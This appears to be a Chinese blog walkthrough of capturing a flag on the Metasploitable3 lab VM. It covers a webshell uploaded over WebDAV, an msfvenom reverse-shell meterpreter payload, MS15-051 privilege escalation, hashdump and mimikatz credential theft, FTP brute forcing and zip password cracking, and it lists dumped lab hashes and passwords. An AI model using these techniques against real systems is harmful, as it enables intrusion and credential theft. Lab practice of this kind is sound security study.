您的位置: 首页  >  文章  >  Metasploitable3-Six of Diamonds 第三个flag

Metasploitable3-Six of Diamonds 第三个flag

分类: 文章 2024-10-27 08:30:10 
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。
eeab49df86839331872f88829ef3c29c.png
我用到了kali的工具cadaver
 在上传php文件前,我首先上传一个txt文件验证一下
 先在kali内新建一个txt文件
 1b0a6f5ecfe2c74bc68e54a96a811a20.png
 保存后上传
 620bfa0c3574831ed9f1fe8b56d58bfc.png
 
 
 上传成功,打开浏览器验证
 5c2e9276925767d174be58ca03496fe3.png
 23d82c6cb5b112b1046688bef0ac4233.png
 用gedit新建一个chopper.php文件,用cadver上传
4de7348246b0de2136cd02a0197fab75.png
cceb610703bde1476343b0f531892a65.png
上传成功
然后用菜刀连接
我试了好几个版本的菜刀才能连上,前几个都是连着连着整个程序崩溃了。
8c553cbaa3cba009e2f9df4bbf9c3f0d.png
另外一个问题就是没办法调出菜刀的虚拟终端
解决方法是断开连接,清除缓存,再重新连接
8f2397011dda3feafad2fc292fe0a91e.png
提权:
msf:
payload生成:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击ip LPORT=随机端口 -f exe >>exp.exe
8b10460a8dbd090beecd5673710e3e1c.png
6d40e4614240e0428c490b0d3def3cc8.png
启动控制端
91b76716bba7a63c47ea69631d75faa8.png
想用菜刀将生成的payload上传,上传了几次,第一次被物理机的nod32杀了(捂脸)
之后几次都不成功,后来想起cadaver ,直接用它将payload上传到靶机上了
c5d90acec37e7dfdfd5a41ccf87135ba.png

在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。
Metasploitable3-Six of Diamonds 第三个flag
我用到了kali的工具cadaver

在上传php文件前,我首先上传一个txt文件验证一下
先在kali内新建一个txt文件
Metasploitable3-Six of Diamonds 第三个flag
保存后上传
Metasploitable3-Six of Diamonds 第三个flag

上传成功,打开浏览器验证
Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag
用gedit新建一个chopper.php文件,用cadver上传
Metasploitable3-Six of Diamonds 第三个flag

Metasploitable3-Six of Diamonds 第三个flag
上传成功
然后用菜刀连接
我试了好几个版本的菜刀才能连上,前几个都是连着连着整个程序崩溃了。
Metasploitable3-Six of Diamonds 第三个flag
另外一个问题就是没办法调出菜刀的虚拟终端
解决方法是断开连接,清除缓存,再重新连接

Metasploitable3-Six of Diamonds 第三个flag

提权:
msf:
payload生成:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击ip LPORT=随机端口 -f exe >>exp.exe
Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag
启动控制端
Metasploitable3-Six of Diamonds 第三个flag

想用菜刀将生成的payload上传,上传了几次,第一次被物理机的nod32杀了(捂脸)
之后几次都不成功,后来想起cadaver ,直接用它将payload上传到靶机上了
Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag

然后在菜刀的虚拟终端上将上传的payload运行,在Kali的控制端可以看到已经拿到靶机的shell了

Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag

getuid:获取服务器当前用户权限
Metasploitable3-Six of Diamonds 第三个flag
hashdunp:显示没有权限
Metasploitable3-Six of Diamonds 第三个flag

加载密码**模块
load mimikatz
Metasploitable3-Six of Diamonds 第三个flag
利用wdigest获取明文密码
Metasploitable3-Six of Diamonds 第三个flag
没有权限,必须要提权
使用msf的模块提权(ms15-051)
search ms15-051
Metasploitable3-Six of Diamonds 第三个flag

查看一下模块相关参数和适用目标
Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag

因为目标系统就是windows64位,所以选择ID 1
Metasploitable3-Six of Diamonds 第三个flag

选择payload为tcp反射型meterpreter

Metasploitable3-Six of Diamonds 第三个flag

show options显示payload相关参数
Metasploitable3-Six of Diamonds 第三个flag
设置相关参数
set lhost 192.168.0.108
set SESSION 1
exploit

Metasploitable3-Six of Diamonds 第三个flag

提权成功,现在为SYSTEM权限
Metasploitable3-Six of Diamonds 第三个flag

hashdump:
Metasploitable3-Six of Diamonds 第三个flag

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9:::
chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8:::
c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee:::
darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0:::
greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76:::
jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4:::
kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001:::
lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f:::
leah_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028:::
luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

经过md5解密得到密码
vagrant
[email protected]
yipp33!!
beep_b00p
thats_no_moon
mandalorian1
rwaaaaawr5

也可以load mimikatz模块来查看明文
load mimikatz

Metasploitable3-Six of Diamonds 第三个flag
wdigest
Metasploitable3-Six of Diamonds 第三个flag

拿到最高权限后,在C:/vagrant/resource目录下发现所有的flag值的目录,然后一个download命令下载到本地,一锅全炖了
Metasploitable3-Six of Diamonds 第三个flag

方法2:
菜刀连上后,找到C:/vagrant/resource/flags目录,打开
发现一个名字为six of diamond.zip的压缩包,当然还有其他flag文件
Metasploitable3-Six of Diamonds 第三个flag
但我这一次只要方块6,将压缩包下载到本地,用360压缩打开,显示带密码,试了一下刚才拿到的最高权限密码vagrant,成功拿下。
Metasploitable3-Six of Diamonds 第三个flag
大功告成

方法3:
不用webshell的方式,经过前面的信息搜集,靶机开着一个21端口,对应ftp服务,可以尝试ftp**

重新打开一个msf终端,搜索ftp**模块

Metasploitable3-Six of Diamonds 第三个flag

加载模块并设置相关参数
Metasploitable3-Six of Diamonds 第三个flag

运行:
成功了3个:
Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag
Metasploitable3-Six of Diamonds 第三个flag
尝试登录
登陆前需要安装一下ftp,我的kali没有安装
安装好后登录,需要输入管理员用户名,尝试用刚才**出来的管理员账户密码登录,登录成功
Metasploitable3-Six of Diamonds 第三个flag

查看一下相关命令
Metasploitable3-Six of Diamonds 第三个flag

使用dir命令查看当前目录文件,发现一个six_of_diamond.zip,用mget命令将其下载到本地
Metasploitable3-Six of Diamonds 第三个flag
但是打开时显示错误,这不得不让我们尝试别的方法
Metasploitable3-Six of Diamonds 第三个flag

我们在前面信息搜集的时候,靶机是开放着http端口80的,对应的服务是iis7.5,我尝试用浏览器访问一下
页面如下
Metasploitable3-Six of Diamonds 第三个flag
右键查看背景图片
Metasploitable3-Six of Diamonds 第三个flag
路径为
http://192.168.0.105/hahaha.jpg

在刚才访问ftp服务器时,我发现ftp对应的目录下也有这个文件
Metasploitable3-Six of Diamonds 第三个flag

它还有caidao.asp,welcome.png,six_of_diamonds.zip
几个文件,分别在浏览器里访问,都能访问到,我尝试从浏览器中下载这个压缩包
Metasploitable3-Six of Diamonds 第三个flag
打开,发现有密码
Metasploitable3-Six of Diamonds 第三个flag

使用fcrackzip来**密码

字典**的用法

-u 是指定zip 格式对于使用字典命令是-D,但是必须要有-p 这个参数才行,也就是:fcrackzip -u -D -p password.txt test.zip
Metasploitable3-Six of Diamonds 第三个flag
找到密码
Metasploitable3-Six of Diamonds 第三个flag
大功告成

相关推荐